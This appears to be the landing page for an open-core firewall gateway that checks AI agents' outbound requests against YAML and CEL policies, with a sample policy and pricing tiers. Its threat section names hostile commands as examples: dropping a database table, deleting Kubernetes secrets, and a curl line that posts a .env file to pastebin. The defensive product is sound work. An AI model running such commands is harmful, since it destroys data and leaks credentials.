Policy-based Firewall Gateway for AI Agents
The firewall between
your AI agents and production
Every outbound request pierces the barrier. What ripples through is what your policy allows — masked, held, or bounced before it lands.
01The threat
One bad inference
drops the table.
Agents run shell, hit APIs, and touch databases. One wrong call is all it takes.
DROP TABLE users
curl -d @.env pastebin.com
kubectl delete secret
token → private host
02How it works
Two layers. One gateway.
SourceAI agent
→
Layer 1Egress filterdomain allow / deny
→
Layer 2Protocol engineSQL · K8s · HTTP + CEL
→
DestinationAPIs · DB · K8s
parsed at the wire
sql.verbsql.tablek8s.resourcek8s.verbhttp.methodhttp.path03Policy · CEL
A verdict before it lands.
- allow matches the allowlist — passes untouched
- deny dangerous payloads never reach prod
- pause ambiguous calls wait for a human
version: 1 egress: default: deny allow: - github.com - api.anthropic.com rules: - name: sql-no-prod-drop endpoint: postgres-prod condition: "sql.verb == 'DROP' || sql.verb == 'TRUNCATE'" verdict: pause # hold for a human - name: k8s-no-secret-delete endpoint: k8s-prod condition: "k8s.resource == 'secrets' && k8s.verb == 'delete'" verdict: deny
04Operating modes
One process, or a whole fleet.
honmoon run -- <cmd>Process wrapperone agent, one machinehonmoon gateway --config p.yamlGatewaya shared, always-on barrierhonmoon join --gateway hostJoina fleet behind one gateway05Open core
Free on a node. Built for a fleet.
◆ OSS core · Apache-2.0
Free — never locked
- Full proxy, parsers & CEL engine
- Single-node YAML policy
- Local audit log + dashboard
- Basic
pauseapproval
▲ Team & Cloud
Fleet · compliance · SSO
- Fleet-wide policy & rollout
- Retention + compliance reports
- Approval routing, Slack, RBAC / SSO
- Hosted SaaS · multi-tenancy · SLA